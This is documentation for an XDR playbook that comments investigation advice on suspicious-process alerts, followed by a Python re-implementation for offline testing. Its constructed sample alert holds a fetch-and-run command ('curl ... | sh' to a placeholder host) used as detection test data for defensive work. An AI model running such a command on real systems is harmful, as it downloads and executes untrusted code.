The "Recommendation. Suspicious process" predefined playbook assesses alerts related to suspicious processes and produces an automatically generated recommendation on further actions: it adds a summarized recommendation as a comment to the alert to support the analyst's next decisions.
Before using the playbook, download the scripts and the dependencies list, which are required for the playbook to work correctly.
To download and prepare the scripts:
1. … the playbooks folder, which contains:
   - the docs folder, which includes DOCX files describing how the playbooks work;
   - the code folder, which includes JSON files with the playbook definitions;
   - the scripts folder, which includes the Python scripts required for the playbooks to run.
2. … api/v3/kuma.
3. In kuma_events.py, specify the values of the following constants:
   - HOST: the Kaspersky Next XDR Expert FQDN or IP address;
   - TOKEN: the API token generated in the previous step.
4. In xdr_link_events.py, specify the values of the following constants:
   - HOST: the Kaspersky Next XDR Expert server FQDN or IP address;
   - user: your user name;
   - password: your password.
5. Copy kuma_events.py, xdr_link_events.py and requirements.txt to a directory on a remote client computer. The default script directory is /opt/xdr_scripts. If you choose a different directory for the scripts, change the value of the workdir parameter in the Input field in the additional settings of each affected advanced playbook.
6. In the directory containing requirements.txt, install the dependencies:
   pip install -r requirements.txt
Both scripts hold credentials in plain text (an API token in kuma_events.py, a user name and password in xdr_link_events.py), so restrict read access to the script directory on the client computer to the account that runs the playbooks.
To create a playbook, refer to the "Creating playbooks" article.
The full expression that the playbook trigger contains. It evaluates to true when the ExternalID values of the alert's Type 3 events, minus the rule IDs listed below, leave an empty array, that is, when every Type 3 event in the alert was produced by one of the listed rules:
.OriginalEvents | map(select(.Type == 3)) | map(.ExternalID) - ["R050_01", "R050_04", "R050_05", "R050_07", "R058_03", "R061_01", "R061_03", "R061_05", "R062_01", "R062_03", "R063_01", "R063_03", "R076_05", "R082_01", "R082_02", "R082_09", "R082_12", "R083_01", "R083_03", "R083_05", "R083_07", "R083_09", "R083_10", "R083_13", "R084_01", "R084_02", "R084_04", "R087_04", "R089_05", "R089_07", "R093_03", "R093_14", "R093_18", "R093_31", "R098_01", "R098_02", "R099_01", "R099_02", "R099_03", "R099_04", "R099_05", "R099_07", "R100_01", "R100_03", "R101_01", "R101_03", "R102_02", "R103_02", "R104_01", "R105_01", "R105_02", "R105_03", "R106_02", "R107_02", "R107_03", "R107_04", "R108_02", "R109_02", "R110_04", "R110_05", "R110_06", "R110_07", "R111", "R150_01", "R150_02", "R151", "R152_01", "R152_02", "R152_03", "R152_04", "R152_05", "R152_06", "R152_07", "R152_09", "R152_10", "R152_11", "R152_12", "R152_13", "R154_03", "R154_06", "R154_09", "R211_01", "R220_02", "R220_04", "R220_05", "R220_06", "R221_01", "R221_04", "R222_02", "R222_03", "R222_04", "R223_02", "R223_03", "R224_02", "R224_03", "R224_08", "R224_12", "R224_13", "R224_14", "R224_17", "R224_18", "R224_19", "R224_20", "R224_21", "R225_03", "R225_05", "R226_02", "R226_03", "R227_02", "R228_01", "R228_02", "R229_01", "R230_02", "R231_02", "R231_03", "R231_04", "R232", "R233_01", "R233_04", "R240_01", "R240_02", "R240_05", "R250", "R270", "R280_01", "R280_02", "R280_03", "R280_04", "R282_01", "R282_02", "R283_01", "R283_02", "R283_03", "R285_01", "R285_02", "R286_02", "R287_01", "R287_02", "R288_01", "R288_02", "R288_03", "R289_02", "R290_01", "R290_02", "R290_03", "R290_04", "R290_05", "R290_06", "R290_07", "R290_08", "R290_09", "R291_01", "R291_02", "R291_03", "R291_04", "R291_05", "R291_06", "R292_01", "R292_02", "R293_01", "R293_02", "R293_03", "R293_04", "R294_01", "R294_03", "R294_04", "R295_01", "R295_02", "R296_01", "R296_02", "R296_03", "R296_04", "R296_05", "R296_06", "R296_07", "R296_08", "R296_09", "R296_10", "R296_11", "R296_12", "R296_13", "R296_14", "R296_15", "R296_16", "R296_17", "R296_18", "R296_19", "R296_22", "R297", "R298", "R299", "R300_01", "R300_02", "R300_03", "R300_04", "R301_01", "R301_02", "R302_01", "R302_03", "R320", "R321", "R330", "R350_02", "R350_04", "R350_07", "R410_03", "R411_01", "R412_01", "R414_01", "R415_01", "R418_02", "R419_01", "R419_02", "R419_03", "R419_04", "R422_01", "R423_02", "R423_03", "R427_01", "R427_04", "R432_02", "R436_02", "R438_01", "R438_02", "R441", "R442", "R050_06", "R058_04", "R061_10", "R082_03", "R082_04", "R082_13", "R083_06", "R083_12", "R089_08", "R099_08", "R152_08", "R209_05", "R211_02", "R224_06", "R224_07", "R224_10", "R224_15", "R231_05", "R231_06", "R231_07", "R231_08", "R231_10", "R282_03", "R286_01", "R286_03", "R286_04", "R286_05", "R302_04", "R302_05", "R302_06", "R405_01", "R405_02", "R405_04", "R412_02", "R413_01", "R416_01", "R418_01", "R422_02", "R423_01", "R427_02", "R429_01", "R430_01", "R433_01", "R433_02", "R433_03", "R433_04", "R433_06", "R434_01", "R434_02", "R434_03", "R434_04", "R435_05", "R436_01", "R436_03", "R443"] | length == 0
Functions used by the playbook: addCommentToAlert.
During execution, this playbook adds a comment to the alert with recommendations on how to investigate the suspicious activity (living-off-the-land binary abuse, command-line and process-tree analysis, account activity on the host, related alerts) and a template for asking the user to confirm the action. The comment text is the same in both decision branches; they differ only in the event field read for the command line: DeviceCustomString5 when the first Type 3 event's base event has DeviceVendor "Unix", and DeviceCustomString4 when it is "Microsoft". If neither branch matches, no comment is added.
The sequence of response actions that the playbook algorithm contains:
{
  "dslSpecVersion": "1.1.0",
  "version": "1",
  "actionsSpecVersion": "1",
  "executionFlow": [
    {
      "decision": {
        "conditions": [
          {
            "name": "deviceVendor is Unix",
            "condition": "${ [ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .BaseEvents[0] | .DeviceVendor == \"Unix\" }",
            "steps": [
              {
                "action": {
                  "function": {
                    "type": "addCommentToAlert",
                    "params": {
                      "text": "${ \"Recommendations for investigating suspicious activity within the scope of this alert:\n├ Define the LotL bin name. Check how this binary can be abused by an attacker. \n├── for Windows: https://lolbas-project.github.io/\n├── for Linux: https://gtfobins.github.io/\n├ Analyze command line. Check if any following behavior is met:\n├── Downloading data from a remote resource\n├── Executing with an unexpected command line\n├── Proxying execution through another process\n├── Executing from an unexpected path\n├── Misuse of a legitimate function\n├ Analyze process tree including parent and child processes.\n├ Analyze account activity on the host before and after suspicious process started\n├ Analyze related alerts with the same account, on the same host or associated with the same process or command line.\n├ In order to confirm if suspicious activity was performed by the user legitimacy there is an option to ask the user to provide an explanation using the following template:\n┌──\n│ Hello,\n│ Suspicious activity has been detected using your account:\n│ \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .Message) + \"\n│ Since this command has been identified as suspicious. Please confirm the legitimacy of the action with a reply email.\n│ Alert details:\n│ Time: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .Timestamp /1000 | strflocaltime(\"%Y-%m-%d %H:%M:%S\")) + \"\n│ Host: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .DeviceHostName) + \"\n│ Account: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .DestinationUserName) + \"\n│ Process: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .DestinationProcessName) + \"\n│ Command: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .DeviceCustomString5) + \"\n└──\n\nIf any signs of hostile activity were discovered, create an incident basing on the alert.\" }"
                    }
                  },
                  "onError": "stop"
                }
              }
            ]
          }
        ]
      }
    },
    {
      "decision": {
        "conditions": [
          {
            "name": "DeviceVendor is Microsoft",
            "condition": "${ [ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .BaseEvents[0] | .DeviceVendor == \"Microsoft\" }",
            "steps": [
              {
                "action": {
                  "function": {
                    "type": "addCommentToAlert",
                    "params": {
                      "text": "${ \"Recommendations for investigating suspicious activity within the scope of this alert:\n├ Define the LotL bin name. Check how this binary can be abused by an attacker. \n├── for Windows: https://lolbas-project.github.io/\n├── for Linux: https://gtfobins.github.io/\n├ Analyze command line. Check if any following behavior is met:\n├── Downloading data from a remote resource\n├── Executing with an unexpected command line\n├── Proxying execution through another process\n├── Executing from an unexpected path\n├── Misuse of a legitimate function\n├ Analyze process tree including parent and child processes.\n├ Analyze account activity on the host before and after suspicious process started\n├ Analyze related alerts with the same account, on the same host or associated with the same process or command line.\n├ In order to confirm if suspicious activity was performed by the user legitimacy there is an option to ask the user to provide an explanation using the following template:\n┌──\n│ Hello,\n│ Suspicious activity has been detected using your account:\n│ \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .Message) + \"\n│ Since this command has been identified as suspicious. Please confirm the legitimacy of the action with a reply email.\n│ Alert details:\n│ Time: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .Timestamp /1000 | strflocaltime(\"%Y-%m-%d %H:%M:%S\")) + \"\n│ Host: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .DeviceHostName) + \"\n│ Account: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .DestinationUserName) + \"\n│ Process: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .DestinationProcessName) + \"\n│ Command: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .DeviceCustomString4) + \"\n└──\n\nIf any signs of hostile activity were discovered, create an incident basing on the alert.\" }"
                    }
                  },
                  "onError": "stop"
                }
              }
            ]
          }
        ]
      }
    }
  ]
}
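As an added example (not part of this page and not the product's own playbook definition), the trigger's set-difference test and the two DeviceVendor branches of the playbook above, re-implemented in Python so that both can be checked offline against a constructed alert before the playbook is enabled. The rule-ID set is a subset of the list in the trigger expression, and SAMPLE_ALERT, its field values and the shortened recommendation text are assumptions made for illustration:

```python
"""
Offline re-implementation of the "Recommendation. Suspicious process" playbook
logic: the trigger's array-subtraction test and the DeviceVendor branch that
chooses which event field holds the command line. Added example; the alert
below is constructed, not real telemetry.
"""
from datetime import datetime

# Subset of the rule IDs listed in the trigger expression. The real trigger
# carries the full list; extend this set with the remaining IDs as needed.
SUSPICIOUS_PROCESS_RULES = {
    "R050_01", "R082_01", "R111", "R152_01", "R224_02", "R296_10", "R443",
}

# Per-vendor event field holding the command line, as in the two branches.
COMMAND_FIELD = {"Unix": "DeviceCustomString5", "Microsoft": "DeviceCustomString4"}

# Shortened version of the playbook's recommendation text (assumption).
RECOMMENDATIONS = (
    "Recommendations for investigating suspicious activity within the scope of this alert:\n"
    "├ Define the LotL bin name. Check how this binary can be abused by an attacker.\n"
    "├── for Windows: https://lolbas-project.github.io/\n"
    "├── for Linux: https://gtfobins.github.io/\n"
    "├ Analyze command line, process tree, account activity and related alerts.\n"
)


def type3_events(alert: dict) -> list:
    """The jq fragment `.OriginalEvents | map(select(.Type == 3))`."""
    return [e for e in alert.get("OriginalEvents", []) if e.get("Type") == 3]


def trigger_matches(alert: dict) -> bool:
    """`map(.ExternalID) - [<rule list>] | length == 0`: jq array subtraction
    drops every ExternalID that appears in the list, so the trigger fires only
    when no Type 3 event carries a rule ID outside the list. An alert with no
    Type 3 events at all also satisfies it (an empty array minus anything is
    empty); the branches below then do nothing because no vendor is found."""
    leftover = [e.get("ExternalID") for e in type3_events(alert)
                if e.get("ExternalID") not in SUSPICIOUS_PROCESS_RULES]
    return len(leftover) == 0


def select_vendor(alert: dict):
    """`[ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .BaseEvents[0] | .DeviceVendor`.
    Returns "Unix", "Microsoft" or None (neither decision branch runs)."""
    events = type3_events(alert)
    if not events:
        return None
    base_events = events[0].get("BaseEvents") or []
    vendor = base_events[0].get("DeviceVendor") if base_events else None
    return vendor if vendor in COMMAND_FIELD else None


def build_comment(alert: dict):
    """Text the addCommentToAlert step would attach, or None if no branch matches."""
    vendor = select_vendor(alert)
    if vendor is None:
        return None
    ev = type3_events(alert)[0]
    # .Timestamp /1000 | strflocaltime(...): epoch milliseconds, local time zone
    when = datetime.fromtimestamp(ev["Timestamp"] / 1000).strftime("%Y-%m-%d %H:%M:%S")
    return (
        RECOMMENDATIONS
        + "┌──\n│ Hello,\n│ Suspicious activity has been detected using your account:\n"
        + f"│ {ev.get('Message')}\n"
        + "│ This command has been identified as suspicious. Please confirm the legitimacy of the action with a reply email.\n"
        + f"│ Alert details:\n│ Time: {when}\n│ Host: {ev.get('DeviceHostName')}\n"
        + f"│ Account: {ev.get('DestinationUserName')}\n"
        + f"│ Process: {ev.get('DestinationProcessName')}\n"
        + f"│ Command: {ev.get(COMMAND_FIELD[vendor])}\n└──\n"
    )


# Constructed sample alert: one Type 3 event whose base event comes from a Linux host.
SAMPLE_ALERT = {
    "OriginalEvents": [
        {
            "Type": 3,
            "ExternalID": "R152_01",
            "Message": "Suspicious process started on host",
            "Timestamp": 1700000000000,
            "DeviceHostName": "srv01",
            "DestinationUserName": "alice",
            "DestinationProcessName": "/usr/bin/curl",
            "DeviceCustomString4": "unused-on-unix",
            "DeviceCustomString5": "curl http://example.invalid/x | sh",
            "BaseEvents": [{"DeviceVendor": "Unix"}],
        }
    ]
}

if __name__ == "__main__":
    if trigger_matches(SAMPLE_ALERT):
        print(build_comment(SAMPLE_ALERT))
```

Running the file prints the comment for the Unix sample. The same alert with the base event's DeviceVendor set to "Microsoft" takes the command from DeviceCustomString4, and an ExternalID outside the list stops the trigger from firing, which is the quickest way to confirm which of your correlation rules this playbook will and will not react to.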